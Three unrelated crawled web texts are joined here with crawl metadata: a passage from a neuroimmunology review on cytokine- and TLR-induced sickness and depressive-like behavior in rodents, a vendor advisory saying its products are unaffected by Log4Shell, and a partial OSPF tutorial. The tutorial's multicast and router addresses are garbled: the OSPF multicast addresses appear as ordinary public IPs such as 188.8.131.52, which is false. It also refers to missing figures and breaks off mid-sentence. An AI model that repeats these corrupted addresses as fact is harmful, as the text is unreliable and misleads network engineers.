(Kentner et al., 2007). Polyinosinic–polycytidylic acid (Poly I:C) injection into mice induces sickness behavior and IFNβ expression, but sickness was not altered by treatment with an anti-IFNβ neutralizing antibody (Matsumoto et al., 2008b). In this same report, rats were directly treated with IFNβ and failed to elicit sickness behavior assessed by wheel-running activity. Similarly, pegylated IFNα-2a or IFNα-2b does not induce sickness in Lewis rats (Loftis et al., 2006) nor does IFNα treatment of Sprague-Dawley rats or C57BL/6J mice (Kentner et al., 2006; Wang et al., 2009). IFN-stimulated genes (ISGs) are expressed at very low levels in the naive brain (Ida-Hosonuma et al., 2005). ISGs are induced in a positive feedback loop, but low initial expression may limit the initial inflammatory response to IFN treatment. This low-level initial response may prevent a strong acute sickness response to IFN treatment. These preclinical data strongly suggest that the IFNs are not directly responsible or required for sickness behavior. The studies with patients suggest that, in a preexisting immune activation (for example hepatitis C infection), IFNα treatment elicits a behavioral response. Prolonged treatment with IFNα results in psychiatric side effects including confusion, manic condition, sleep disturbance and a syndrome characteristic of depression (Paul et al., 2007; Raison et al., 2005). This behavioral response is possibly elicited by an amplification of the actions of other existing pro-inflammatory cytokines, much as described above for IL-6. If IFNs act in a similar way to IL-6 to amplify behaviors elicited by other cytokines, it would be expected that IL-6 and IFNs share a common intracellular signaling mechanism. Indeed, that is the case as illustrated in Fig. 5. All IFNs signal through the JAK → STAT pathway, as does IL-6. After a careful literature search, we could not find evidence that IFNs activate ceramide synthesis within neurons despite the presence of IFN receptors on neurons (Fig. 5). Thus, IFNs alone do not directly alter behavior but instead alter behavior on a background of pre-existent immune activation. Unlike sickness behaviors, there is a probable role of IFNs in the induction of depression. Mice lacking IFNγRs do not develop depressive-like behavior when infected with BCG (O’Connor et al., 2009a). The lack of a depressive-like response may again be analogous to IL-6 action. In the absence of IFNγRs, brain and lung cytokine expression at the time of depressive-like behaviors was less than that of wild-type controls. Similarly, IFNγ-deficient mice have an attenuated cytokine response (Litteljohn et al., 2010). Thus, IFNγ action may be necessary to maintain the expression of other cytokines or elicit a separate but parallel signal that is insufficient alone but is needed to drive depressive-like behaviors. This hypothesis is supported by the lack of depressive-like behaviors of naive mice treated with IFNα (Kosel et al., 2011; Wang et al., 2009). Therein, IFNα treatment alone has no depressive-like effect because there is no pre-existing pro-inflammatory response to amplify. Cytokines and behavior summary The mediating role of cytokines on behavior can be summarized by saying that TNFα (sickness and depression) and IL-1β (sickness) alter behavior by direct actions on neurons probably mediated by ceramide synthesis. In contrast, IL-6 and IFNs play little, if any, direct role in modulating behavior in the absence of other cytokines but amplify the behavior effects induced by TNFα and IL-1β. The direct behavior-altering actions of TNFα and IL-1β on neurons does not preclude a lack of input by other cells within the brain. TNFα and IL-1β regulate glia activity to control uptake and release of neurotransmitters. Indeed, a low level of pro-inflammatory cytokine activity within the brain is necessary for normal cognition via maintenance of proper neurotransmitter levels (Yirmiya and Goshen, 2011). It is only when the neuroinflammatory response and input on neurons is at an imbalance that behavior shifts to a sickness or depressive-like state. We believe that inhibition of JNK blocks TNFα-induced sickness because it acts to suppress the feed-forward cytokine loop mediated by the MAPK pathways within glia whereas FAN deficiency illustrates that cytokines cannot induce behavioral changes unless neuron activity is altered by ceramide (Fig. 5). TLRs and behavior The penultimate question that is to be addressed below is: what is the mechanism by which infections induce behavioral changes? An even cursory literature review would indicate that infection causes sickness. Every person experiences multiple bouts of sickness throughout life and many people experience some form of depression so we all know that behavior is modified by infections. Clearly, bacterial, fungal, viral or parasitic infection will induce malaise, social withdrawal and fatigue in addition to fever and depressed appetite; this is indisputable. However, to develop new therapies to treat behavioral changes associated with infection, the pathways involved in eliciting these changes must be identified. Identifying these pathways should permit the alleviation of behavioral changes associated with inflammation, without ameliorating the inflammatory response needed to fight the infection. From the above discussion, we have described that infections cause inflammation, inflammation elicits cytokine expression, and cytokine expression changes behavior. Below, we will examine whether all TLRs are involved in this cascade. TLR5 and TLR11: protein-activated PRRs A study examining TLR5 activation and sickness illustrates a well-designed approach to the validation of TLR specificity. Flagellin activates TLR5, but infectious agents such as flagellate bacteria also contain other TLR agonists; in this case, Gram-negative bacterial LPS could also activate TLR4 to induce behavioral changes. In a study by Matsumoto, sickness behavior, which was quantified as decreased LMA (wheel-running activity) was induced by the injection of live Salmonella (Matsumoto et al., 2008a). To confirm that this flagellate was acting through TLR5, Salmonella was injected into C3H/HeJ mice, which lack functional TLR4. An almost identical LMA response was found between C3H/HeJ and control (C3H/HeN) mice. In the same study, gentamicin-treated Salmonella, which have reduced flagellin content, have a markedly diminished sickness response compared with non-treated Salmonella. In addition, flagellin-treated mice also respond with diminished LMA, showing that the purified ligand itself induces a sickness behavior. This study, by itself, confirmed that live bacteria elicit sickness through a TLR-specific mechanism that can be mimicked by direct administration of the ligand and can be attenuated by loss of the ligand. Flagellin injection also elicits a systemic inflammatory response (Eaves-Pyles et al., 2001), which is the likely mechanism for the behavioral response as described above. The Matsumoto research also indicates that Salmonella initiates an inflammatory response largely independent of TLR4 and that heat-killed Salmonella, with denatured flagellin, was less potent than live bacteria (Matsumoto et al., 2008a). It was hypothesized that TLR5 activation by flagellin initiated the immune response. Only after this initiation and attack on live bacteria by the host would LPS be released to activate TLR4 and synergize with the initial response to clear the body of the bacteria. Thus, it is likely that Salmonella elicit full-blown sickness behavior by activating at least two TLRs. Although profilin is necessary for Toxoplasma recognition and activation of cytokines (Plattner et al., 2008; Yarovinsky et al., 2005), the role of this ligand, the subsequent activation of TLR11, the release of IL-12 and the expression of IFNγ in behavioral changes has not been investigated. The human TLR11 analog is a nonfunctional pseudogene and thus does not play a role in the immune response or subsequent behavioral changes (Pifer and Yarovinsky, 2011). Thus, it is not known if TLR11 activation is directly responsible for behavioral changes. TLR3, TLR7, TLR8 and TLR9: nucleic acids Although frequently studied relative to infection, activation of the TLRs that recognize nucleotides – TLR3, TLR7, TLR8 and TLR9 – has been given relatively little attention as direct modifiers of animal behavior, with the exception of studies with TLR3. Poly I:C has proven to be an effective activator of TLR3 and inducer of transient sickness. Systemic administration of poly I:C induces weight loss and diminished food intake. This physiological response is associated with neuroinflammation, especially type I IFNγ/β expression, within the brain. This neuroinflammatory response mimics the peripheral inflammatory response (Field et al., 2010). Poly I:C administration to mice induces a transient slight increase in core body temperature but a strong sickness behavioral response, assessed as a decrease in LMA and burrowing activity (Cunningham et al., 2007). This sickness response is accompanied by a marked increase in circulating IFNβ, IL-6 and TNFα followed by CNS mRNA expression of the same cytokines and, to a lesser extent, IL-1β albeit IFNγ is not increased (Cunningham et al., 2007; Gandhi et al., 2007; Konat et al., 2009). This cytokine profile is similar to that shown in Fig. 2. In addition to a sickness response, poly I:C administered i.p. has been shown to induce chronic fatigue syndrome, evidenced as a prolonged decrease in voluntary wheel-running (LMA) (Katafuchi et al., 2005; Katafuchi et al., 2003). Fatigue was present while CNS IFNα mRNA level was still elevated, but after central IL-1β expression, it had returned to control levels. This TLR3-mediated behavior appears to be a form of central fatigue or depressive-like behavior as it was ameliorated by the anti-depressant imipramine, which is a nonselective serotonin reuptake inhibitor. Although poly I:C induces a prolonged fatigue response and a rapid rise in circulating IFNβ, an acute injection of IFNβ does not mimic this behavioral effect (Matsumoto et al., 2008b). These data suggest that other cytokines are necessary for the behavioral response, as discussed earlier in the IFN section. In addition to prolonged fatigue, prenatal exposure of dams to poly I:C has been used as a model for inflammation-induced schizophrenia-like behaviors that are expressed by the offspring (Macêdo et al., 2012; Piontkewitz et al., 2012). Thus, age-at-exposure to an immune challenge alters the phenotypic expression pattern. With adult mice, poly I:C also decreases swim time (increases immobility) in the FST for up to 1 week post i.p. administration (Sheng et al., 2009). Although referred to as a fatigue response within the manuscript, an increase in immobility in the FST is used to assess despair and diagnose depressive-like behavior in preclinical rodent models. The diminished performance in the FST continued for several days after spontaneous cage LMA had returned to normal (an index of sickness); thus distinguishing fatigue/depressive-like behavior from sickness. Exposure to imiquimod, a TLR7 agonist, induces only a modest cytokine response within the brain that is associated with the induction of fever. Similarly, only a modest sickness response was evidenced as a slight decrease in food and water intake but no change in overall LMA of rats (Damm et al., 2012). I have confirmed this and found a modest sickness response to imiquimod with mice (R.H.M., unpublished observations). In contrast, the TLR7 agonist 1V136 induces a potent sickness/anorexic response when administered i.p. but a more potent response when administered intranasally (i.n.) (Hayashi et al., 2008). Intranasal administration elicited a greater behavioral response despite a similar peripheral cytokine response, suggesting that neuroinflammation was responsible for anorexia. These data are consistent with probable transport of the TLR7 agonist directly to the brain via the trigeminal or olfactory pathway when administered i.n. and suggest that activation of TLR3 and TLR7 elicits a behavioral response. These data with TLR3 implicate cytokine production as the mediator of the behavioral changes. TLR2 heterodimers and TLR4: membrane lipids As illustrated in Fig. 2, TLR2 forms heterodimers with TLR1 and TLR6, thereby changing the ligand recognition pattern. Both heterodimer receptors are localized to the plasma membrane to recognize extracellular PAMPs. TLR2 is not considered to be endogenously expressed TLR on naive neurons. However, activation of TLR2/6 heterodimers with macrophage-activating lipopeptide (MALP)-2 derived from Mycoplasma fermentans induced sickness behavior and an accompanying loss of body mass and decrease in food consumption in rats (Knorr et al., 2008). When given s.c., a local inflammatory response, involving elevated expression of TNFα and IL-6, resulted in elevated circulating IL-6 and activation of STAT3 in the organum vasculosum of the laminae terminalis (OVLT), suprafornical organ (SFO) and area postrema (AP) (see Fig. 1). TNFα was not detectable in the circulation (IL-1β was not quantified). This IL-6-dependent activation of cytokine signaling within the circumventricular organs of the brain was accompanied by sickness behavior assessed as decreased home cage activity; i.e. LMA. In a previous study using i.p. injections, MALP-2 and fibroblast-stimulating lipopeptide (FSL)-1, a TLR2/6 synthetic activator based on the structure from Mycoplasma salivarium, induced a transient fever as well as a prolonged decrease in home cage activity, low LMA, and elevated circulating levels of both TNFα and IL-6 (Hübschle et al., 2006). The comparative strength of the immune response between these two studies paralleled sickness behavior, supporting the role of cytokines as mediators of sickness behaviors following TLR2/6 activation. This relationship was confirmed by the use of TNF binding protein. TNFbp blocked the pyrogenic effect of FSL-1 and its ability to induce IL-6 expression (Greis et al., 2007). Zymosan, a yeast particulate, given to rats induced a fever and diminished a motivated behavior: decreased consumption of sweetened cereal (Cremeans-Smith and Newberry, 2003). Neither fever nor food disappearance are behaviors per se but, together with behavioral assessment in the previous studies, these physiological responses indicate that zymosan activation of TLR2 signaling is probably a behavior-modifying event. Indeed, zymosan given i.p. to several strains of mice induces full blown sickness behavior including diminished locomotor activity, body writhes (pain) and sedation. The sickness response was attenuated by morphine, which has anti-inflammatory activity (Natorska and Plytycz, 2005). Clearly, TLR4 activation by LPS is the model most prevalent in the literature that is used to induce inflammatory-dependent behavioral changes. Numerous investigators have contributed to this literature and it would be impossible to acknowledge all the important work in a single review. Our recent work has added to the understanding of the sickness response by showing that an i.c.v. dosage as low as 10 ng of LPS induces a central immune response, including elevated expression of TNFα, IL-1β and IL-6 in the brain of mice. Even this low dose of LPS causes full-blown sickness behavior, including depressed LMA and decreased social exploration, together with expected physiological responses such as loss of body mass and reduced food intake (Park et al., 2011a). In contrast, a higher dosage of LPS is required when administered i.p. (Park et al., 2011b). At 330 or 830μg kg–1 body mass i.p. (∼10,000 and 25,000 ng mouse–1, respectively), LPS induces an inflammatory response within the brain and a full spectrum of sickness behaviors. Unlike a low i.c.v. dose, i.p. LPS induces a peripheral immune response, including the induction of circulating IL-6, IL-1β, TNFα and IFNγ (Finney et al., 2012; Gibb et al., 2008). Similar to the well-characterized sickness response, LPS was shown almost 20 years ago to induce behaviors that relate to depression of humans. Systemic injection of LPS in rats causes a typical sickness response and an anhedonic phenotype, assessed as a decreased preference for consumption of a saccharin solution (Yirmiya, 1996). Our recent data support this early literature by showing that central (i.c.v.) or peripheral (i.p.) LPS induces a depressive-like phenotype when quantified as increased time of immobility in the TST and FST (Park et al., 2011a; Park et al., 2011b). The increased time of immobility in these tests is frequently used as an index of despair. More importantly, the depressive-like behavior is still evident after food intake and LMA have returned to normal, indicating that sickness behavior had waned (O’Connor et al., 2009b). This later point is critical to the interpretation of depressive-like behavior. Within the acute-phase immune response to LPS (<24 h for i.p. dosage of 830μg kg–1 body mass), mice have decreased immobility in the LMA test, FST and TST. However, by waiting until LMA activity is back to control levels (>24 h), it is easier to defend the increase in time of immobility as a depressive-like behavior and distinct from sickness behavior. In this same study, minocycline, which decreases cytokine production, prevents both sickness and depressive-like behavior, illustrating that cytokines mediate the behavioral changes. Similarly, the anti-inflammatory COX inhibitors indomethacin and nimesulide and the anti-inflammatory glucocorticoid analog dexamethasone, attenuated i.p. LPS-induced sickness, depressive-like behavior and anxiety of mice (de Paiva et al., 2010). In this study, sickness was evident following LPS treatment; decreased food disappearance and loss of body mass. Sickness behavior was evident as a decrease in LMA and number of rearings. Depressive-like behavior was quantified as an increase time of immobility in the FST and TST. Anxiogenic-like behavior was evident following LPS treatment using the light–dark box test wherein LPS caused a reduction in number of transitions between light and dark regions of the box. This extensive behavioral evaluation clearly indicates the global action of LPS on a variety of behaviors and the role of inflammation in a variety of behaviors. Prostaglandin involvement in TLR-mediated behaviors As discussed above within the cytokine section, where either TNFα or IL-1β are required for sickness behaviors, these cytokines are not the only factors involved in LPS-induced behavioral changes. In another study, inhibition of COX-1 alleviates sickness behaviors without changing peripheral or central expression of proinflammatory cytokines (Teeling et al., 2010). In this study, the selective COX-1 inhibitor piroxicam was effective at attenuating the LPS-induced decrease of burrowing activity but not in attenuating LPS-induced LMA. Thus, despite the importance of cytokines in LPS activity, a separate pathway involving prostaglandin production via COX-1 may be requisite for certain behaviors such as species-specific burrowing. Using other inhibitors, Teeling et al. also showed that COX-2 activity, thromboxane production and PPAR-γ activity did not appear to be requisite for LPS activity (Teeling et al., 2010). The mechanism by which COX-1 acts to modulate behavior may involve neuroinflammation, although this was not revealed by the Teeling study. Inhibition of COX-1 activity with SC-560 or COX-1 deficiency attenuates i.c.v. LPS-induced IL-1β and TNFα, but not IL-6, expression within the brain (Choi et al., 2008), suggesting that COX-1 is necessary for the inflammatory activity of LPS. Whether prostaglandins accentuate cytokine-dependent sickness behaviors, playing an amplifying role as described for IL-6 and the IFNs, or have other distinct modus operandi awaits further studies. A study performed 30 years ago, however, does indicate that PGD2 decreases LMA, and this finding supports a direct sickness effect for prostaglandins on sickness behavior (Förstermann et al., 1983). Prostaglandin synthesis is clearly implicated in the febrile response elicited by LPS (Pecchi et al., 2009), but its mediating effect on inflammation-dependent behavior is poorly understood. However, the bulk of the literature implicates cytokines as required initiators and sustainers of both inflammation-induced sickness and depressive-like behaviors. Indeed, inhibition of neuroinflammation, as occurs with i.c.v. administration of IGF-I, results in attenuated depressive-like behaviors, indicating that a naturally occurring neurotrophin feeds back within the CNS to regulate inflammation-induced depression (Park et al., 2011a). Being the most exploited model, some very important aspects of inflammatory-dependent behaviors have been made using LPS as an inducer. Of most importance to this review is the dependence of cytokines in behavior changes. Surprisingly, mice respond to LPS with behavioral changes even when lacking TNF-R1 (Palin et al., 2009) or IL-1R1 (Bluthé et al., 2000a) but require TNFα if the IL-1R1 is absent (Bluthé et al., 2000a). Similarly, treatment with neutralizing antibodies to either IL-1β or TNFα does not attenuate LPS-induced changes in behavior, with sickness behavior assessed as burrowing activity (Teeling et al., 2007), because neutralizing both is necessary to block LPS activity. These data indicate that either TNFα or IL-1β alone are able to mediate the sickness response associated with LPS but at least one of these cytokines must be present within the brain to induce sickness. These data strongly suggest that, in the absence of TNFα and IL-1β, the remaining cytokines, including IL-6 and IFNs, and prostaglandins are not sufficient to alter behavior. As described earlier, TNFα or IL-1β administered alone initiate full-blown sickness behaviors, whereas IL-6 and IFNs administered alone are insufficient. IFNγ signaling is needed for LPS to induce depressive-like behaviors (see IFN section), but IFNs administered alone do not cause these behavioral changes. It appears that LPS-induced IL-6 and IFNγ are needed to amplify the actions of TNFα or IL-1β and thus their behavioral response. Nod1 and Nod2: bacterial peptidoglycans Nod1 and Nod2 activation has not been extensively studied with regard to animal behavior. After an extensive search, direct evidence that Nod1 activation induces sickness or depressive-like behavior has been elusive. However, there are reports that bacterial peptidoglycans are direct mediators of sickness via Nod2. The minimally active subunit of bacterial peptidoglycan, muramyl dipeptide (MDP), is able to elicit a decrease in food intake of rats (Fosset et al., 2003). In addition to food disappearance, MDP was shown to change the eating behavior. MDP caused a decrease in eating bout frequency that corresponded with an increase in eating bout duration. This change in eating behavior was accompanied by a greater time resting and less time grooming for MDP-treated rats compared with controls. The increased resting and diminished grooming are considered sickness behaviors. Interestingly, one of only a handful of studies that compare the behavioral effects of various TLR ligands was performed with MDP, LPS and poly I:C (Baillie and Prendergast, 2008). In this study, i.p. administration of LPS caused a loss of body mass, diminution of food disappearance, decrease in consumption of a saccharin solution and decrease in nesting behavior in Siberian hamsters. LPS and poly I:C had similar effects on changes in body mass, food intake and saccharin consumption, but poly I:C did not affect nesting behavior. In direct contrast to poly I:C, MDP did not alter body mass, food intake or saccharin intake but did decrease nesting behavior compared with controls. Reverting to our TLR signaling pathways (Fig. 2), it is possible to propose that the MyD88 pathways activated by TLR2/6 and TLR4 mediate the change in nesting behavior induced by LPS and MDP, respectively, whereas the TRIF-dependent pathways activated by TLR3 and TLR4 via poly I:C and LPS, respectively, regulate feeding and drinking activity and subsequent change in body mass. This, of course, is an oversimplification of the intricacies of the TLR immune response. However, the results do suggest that specific TLR agonists, by themselves, may not fully activate all aspects of sickness. This hypothesis suggests that different symptoms may be related to the induction of a specific combination of cytokines. In a separate study, LPS was a more potent anorexic agent than MDP, and this action correlated to the greater ability of LPS to induce TNFα and IL-1β expression in the cerebellum, hippocampus and hypothalamus (Plata-Salamán et al., 1998). Thus, anorexia was related to specific cytokines being expressed in specific brain regions. These data indicate that Nod2 activation can induce behavioral changes, but taken together they clearly indicate that LPS is the most potent inducer of sickness behavior, possibly because it directly induces both of the inflammatory signaling pathways (NF-κB and TRIF) and thus induces the most complete array of cytokine expression.p reference link : https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3515033/ Source: Chapman University
<urn:uuid:a0971663-dd8e-466d-904b-58f78a0f42e9>
CC-MAIN-2022-40
https://debuglies.com/2022/08/31/our-brains-obtain-information-from-sick-people-eliciting-changes-in-our-physiology-and-immune-response/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00221.warc.gz
en
0.908335
12,879
2.96875
3
Understanding the vulnerability On the morning of December 9, 2021, the security team at Alibaba Cloud published a vulnerability involving arbitrary code execution involving Log4j, a widely used Java-based logging framework, which allows threat actors to gain complete remote access to web servers and application logs. The vulnerability was dubbed Log4Shell. The United States Cybersecurity and Infrastructure Security Agency also issued guidance about a vulnerability in Apache’s Log4j software on Monday, December 13, 2021. Subsequently, a second vulnerability was announced due to an incomplete patch. Apache Log4j is java software widely used by many companies for logging purposes. It is often included or bundled with third-party software packages. First discovered on the 24th of November, the vulnerability was already being exploited with cybercriminals scouring the internet to gain access to affected systems. The exploit came at a strategic time when almost half the workforce is unavailable to man damage control operations on account of the holiday season. Present and future considerations The vulnerability does not directly affect the majority of end consumers owing to the diminishing popularity of Java in consumer programmes, however, the logging library remains in broad use among enterprises. Therefore, the zero-day vulnerability has prompted major corporations and government agencies throughout the world to identify affected systems, patch exploits and install updates to prevent data breaches. As security teams were scrambling to patch the bug, threat actors had already been working on extracting sensitive information and infiltrating systems. Attackers are spreading botnets such as Mirai and Kinsing to perform a variety of illegal activities ranging from remote cryptocurrency mining to DDoS attacks. Long term impact As the vulnerability and exploit vectors continue to evolve, the Log4j vulnerability is likely to stay for a long time. Like COVID-19, which keeps mutating and spreading rapidly despite widespread vaccination, the Log4Shell bug is being exploited despite patches being released. Moreover, the attack has the potential of disrupting information exchange and delivery across international tech giants as big as Microsoft and Apple. The timing and scale of the vulnerability can potentially damage global supply chains similar to the Kaseya VSA ransomware attack witnessed earlier in 2021 but at a much wider scale. The road ahead Even though it seems like the bug has gone haywire, all hope is not gone. Apache Software Foundation, the developers of the Log4j framework, has already released patches and are constantly monitoring the situation spreading awareness and working with several cyber security teams globally to protect enterprise data. Companies worldwide are being recommended to check their systems for vulnerability and install updates on affected systems to mitigate damage. Although a patch may seem like a silver bullet solution for the bug, that is not the case. Apache has already released two versions of the patch in less than a fortnight and more can be expected owing to the evolving nature of the threat. The security of both BluSapphire products and our customer’s safety is a top priority for us. In response to these vulnerabilities, BluSapphire has taken immediate action to proactively address any critical vulnerability affecting our products and solutions containing the Log4j software library. Upon notification of the Log4j vulnerability report the BluSapphire Security Team initiated investigations in accordance with our incident response processes. BluSapphire followed the guidance issued to all Log4j customers in addition to following our internal processes for investigation, forensics analysis, and threat mitigation. BluSapphire will continue to remain vigilant regarding all aspects of this challenging and evolving situation. At this time, there have been no compromises or successful exploits observed in BluSapphire products, solutions or in the BluSapphire environment. The majority of our products and solutions are not affected by the vulnerability as we do not use the vulnerable components of Log4J. However, to be extra safe, we have either upgraded the Log4J versions to 2.16 where possible OR disabled JNDI functionality and removed the relevant JMSAppender from our packages. This ensures that our packages are not affected by the disclosed vulnerabilities. BluSapphire will continue to update this advisory as additional information becomes available and will provide answers to common questions below. This advisory should be considered the single source of current, up-to-date, authorized and accurate information from BluSapphire regarding fully supported products and versions. Frequently Asked Questions 1. Are BluSapphire products affected by the Log4j vulnerability? Which Products were affected? BluSapphire products do not use Log4j software and therefore are unaffected. However, they may be present in the installation packages as part of transitive dependencies. To avoid any future concerns these dependencies have been removed from the packages. 2. What remediation actions have been taken? All BluSapphire products, software and infrastructure have been evaluated and countermeasures have been implemented for protection. Countermeasures are in the form of - mitigation steps recommended by Apache Log4J - removed vulnerable files from the jar packages - upgrade to 2.16 where possible 3. Will this incident impact or interrupt the delivery of BluSapphire products and services? At this time, we are not anticipating any service disruptions for any BluSapphire products or services. 4. What is the impact to BluSapphire’s business? There is no impact to BluSapphire’s business at this time. 5. How does BluSapphire protect its environment from potentially affected software? In response to this vulnerability, BluSapphire has followed the recommendations from Apache and the United States Cybersecurity and Infrastructure Agency. These actions also include patching and increased monitoring. Our security team works 24x7 to protect BluSapphire. 6. How are BluSapphire’s on-site deployments affected? As noted before, BluSapphire’s products themselves do not use Log4J functionality and hence are not impacted. However, there may be transitive dependencies that may have inadvertently packaged Log4J unnecessarily. For these deployments we recommend reaching out to [email protected] for mitigation and/or upgrade options. These support calls will be free.
<urn:uuid:918c4f21-ae1f-4a3f-ade8-2a0ac8a582ba>
CC-MAIN-2022-40
https://www.blusapphire.com/blog/decoding-the-log4shell-pandemic
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00221.warc.gz
en
0.947159
1,274
2.671875
3
In the last post, we talked about some of the basics of OSPF. We discussed how neighbors form adjacencies, the multicast addresses OSPF uses, and some of the timers that OSPF uses. Before we jump into this post I want to cover a few items that I may have left out. Namely, I want to talk about the configuration we used to get to the end state we saw at the end of the first post. Some of the configuration commands we discuss will drive other conversation. Here’s our lab topology… The configuration for OSPF is not unlike EIGRP. However, there are some rather distinct differences. Let’s look at the configuration of router1 to get a sense for how the configuration works… This is basically it. Again, we are using sub interfaces since the router’s I have only have two Ethernet interfaces. The OSPF configuration looks remarkably similar to that of EIGRP with a few exceptions. First off, the ‘router ospf 1’ does not mean the same thing that it did in EIGRP. In EIGRP, the number following the ‘router eigrp’ command was the AS (Autonomous System) number. This HAD to match on any routers that you wanted to become neighbors. In OSPF, it’s actually a number symbolizing a process ID. With that being the case, it does NOT need to match on routers that you would like to become neighbors. Secondly, you’ll notice the addition of the ‘area 0’ tacked onto the end of the network definition. This is a considerable change from EIGRP. EIGRP had a single plane that all router’s ran on. OSPF can be separated into different areas and routes distributed between them based on what type of area they are. This is a large advantage over EIGRP (in some peoples minds) since it limits the amount of advertisements. Let’s talk a little bit about areas and then dive into router roles… OSPF works off of the concept of areas. Regardless of how many areas you intend to build, there will always be one area. That one area that MUST exist is area 0. Area 0 is also commonly referred to as the backbone area. All other areas MUST connect to area 0. Since OSPF is a link state protocol, by default, each router wants to have all of the information available so it can make it’s own decisions about the best path. Areas break that definition slightly. Routers in one area will have full topological awareness of each and every router in the same area. However, routers in different areas don’t. To put that a different way, routers in different areas have different links state databases. This also means that any LSA flooding (for certain LSAs) occurs only within a single area. When we talk about traffic flowing through areas, we categorize the traffic in 3 main ways. Intra-area traffic is the traffic within a single area. Inter-area traffic represents traffic shared between areas. And finally external traffic represents traffic coming in from a different routing source (AKA another IGP). There are different ‘kinds’ of areas but this isn’t worth discussing until we get a little more information about LSAs. That quick discussion on areas lends itself nicely to talking about the different router types. Router types are essentially defined by the area(s) they are in. Internal routers – A router that has all of it’s interfaces in the same area. It can be assumed that there will also be only one copy of the link state database on internal routers. Area Border Routers (ABRs) – ABRs can be thought of as bridging routers. The ABR bridges traffic from one or more non-backbone areas to the backbone area. An ABR MUST have one interface in the backbone. This being said, ABRs have two or more link state databases. Backbone routers – I’m not even sure why they make this distinction since it’s a rather general one. Essentially any router that has a single interface in area 0 is a backbone router. Internal routers and ABRs could both be backbone routers. Autonomous System Boundary Routers (ASBRs) – ASBRs are routers that redistribute information from another routing protocol into OSPF. An ASBR can live anywhere in the OSPF topology except in a stub area (we’ll see why shortly). Network Types and the DR/BDR While we are on the topic of router types, we should also talk about what OSPF sees as the different network ‘types’. Depending on the type of network, OSPF will handle the configuration slightly differently. The main difference is whether or not a router is elected as the designated router (DR) and backup designated router (BDR). Before we talk about the DR and BDR I should also point out that each network type can further be classified into either a transit or stub network. Transit networks have 2 or more routers attached to them whereas stub network only have a single router attached. Loopback interfaces are a great example of stub networks. DO NOT CONFUSE THE NETWORK TYPE WITH THE AREA TYPE! TWO DIFFERENT THINGS! Point to point and point to multipoint networks do NOT have the concept of a DR and a BDR where Broadcast and NBMA do. The concept of the designated router is in place to solve a particular problem that multi-access networks bring with them. The big hitter is LSA flooding. Think about a bunch of routers on the same Ethernet segment flooding all of their LSAs to each other who it turn flood the LSAs to all of the other routers. That’s a lot of unnecessary flooding to share the same information. The second issue DRs and BDRs solve is that of adjacencies. If every router had an adjacency with every other router that would equate to a lot of adjacencies which would then equate to unnecessary flooding of router LSAs. To solve this problem, multi-access networks elect a DR that is responsible for representing the the entire multi-access network (and all connected routers) as well as to mange the flood process within the multi-access network. Each router on the network will form an adjacency with both the elected DR on a segment as well as the elected BDR. The election of the DR and BDR is based on configured priority ,and when not configured, is based on the router’s RID. Taking a look at a subsection of our lab topology, we can see this in action… While in reality, each of my segments is a multi-access network (Ethernet when not manually configured to be point to point) and will elect a DR and a BDR, this section is truly a multi-access network. Here, router1, router2, and switch1 share a common subnet. If we look at the neighbors from the perspective of each device we can get some insight on the DR and BDR roles… In this case, we can see that they’ve elected router router2 as the DR and switch1 as the BDR. But why wasn’t switch1 picked as the DR since it had a higher RID? Like the RID reconfiguration example we saw in the first post, it’s a matter of timing. And apparently, it’s very, very, very picky about the timing. I was initially confused on the matter so I posted a question about it at network-forum. Deadcow and mellowd took a look at it for me and eventually we determined that it was spanning-tree causing the problem. To be honest, I’m still not 100% sure why, but since I’m using an SVI that relies on vlans to be ‘up’ for it to be ‘up’ I must have introduced some delay into the election process which caused 126.96.36.199 to not be elected as the DR. After enabling ‘spanning-tree portfast trunk’ on the switch interfaces I got the results I was looking for… OSPF routers on a mutli-access subnet ONLY form adjacencies with the DR and the BDR. Adding in a 4th device temporarily we can see this in action… In this case, we can see that adjacencies formed only with the DR (Switch1) and BDR (router3) on router1… All other routers will show as being in a DROTHER state. If we look at some transactional data (LSU traffic) we can see the DR and BDR in action… Notice that all router’s continue to send hellos to the ‘all OSPF routers’ multicast address of 188.8.131.52. When we get in a transactional situation dealing with LSA update we can see that the BDR (router3, 10.0.0.4) is sending it’s updates to the same address (First red box). However, when non-DR or non-BDR router’s reply, they only do so to the 184.108.40.206 address which is also known as the ‘all DR/BDR router address’. In this manner, all of the updates from the DR/BDR still get to all routers, but the responses from the non DR/BDR routers only go to the DR/BDRs. LSAs and Link state DB Now that we’ve discussed areas and router types, let’s talk a little bit about LSAs and the link state database. Since each router is making it’s own routing decisions, it is imperative that all of the routers in the same area have an identical link state database. This is achieved by neighboring routers telling each other about all of the other LSAs that it knows about. The confusion comes in when we start talking about LSAs. After all, taking a look at the link state database doesn’t really appear to tell us a whole heck of a lot about the prefixes we see in the routing table… In fact, we don’t see anything at all in the link state database output that even looks like a prefix. That’s because we are ,once again, just looking at the LSA headers. Let’s talk a little bit about the different LSA types before we dive into how to actually look at them on the router. Let’s just throw each LSA type into this table and then talk about them one at a time… Router LSA (1) – The router LSA is generated by all routers and lists all of the router’s links, their associated cost, state, and any known OSPF members that exist on that particular interface. These LSAs are only flooded within the area which they are originated. Network LSA (2) – The network LSA is generated by the DR of a multi-access network. The LSA contains information about the network including attached routers and is flooded only within the area in which they are originated. Network Summary LSA (3) – This LSA type is originated by ABRs and are sent into a single area to to advertise destinations that are reachable outside of that area. This essentially tells all of the routers inside a specific area what other prefixes are available through a specific ABR. Additionally, this LSA type is used to send prefixes available within a specific area into the backbone area (0). Lastly this LSA type is used to advertise default routes that originate from another OSPF area. ASBR Summary (4) – This LSA type is used to advertise the location of a ASBR. The destination is not actually a prefix, but rather a specific host address of an ASBR. AS External (5) – This LSA type is advertised only by ASBRs and advertises either a default route, or a prefix that’s accessible outside of the OSPF domain. Group Membership (6) – Used for multicast OSPF (MOSPF) NSSA External (7) – We’ll be discussing not so stubby areas (NSSAs) coming up shortly. An NSSA external LSA is used to advertise a destination only within the NSSA area in which the destination originated. External Attributes (8) – Proposed for carrying BGP info over OSPF. Never implemented. Opaque (9,10,11) – Used to carry other information that may or may not be used by the actual OSPF routers. Now that we know the different kinds of LSAs, we can talk about specific area types. To put it simply, the ABR bordering a stub area and the backbone area simply advertises a 0’s route into the stub area using a type 3 (network summary) LSA. The idea here being that to access 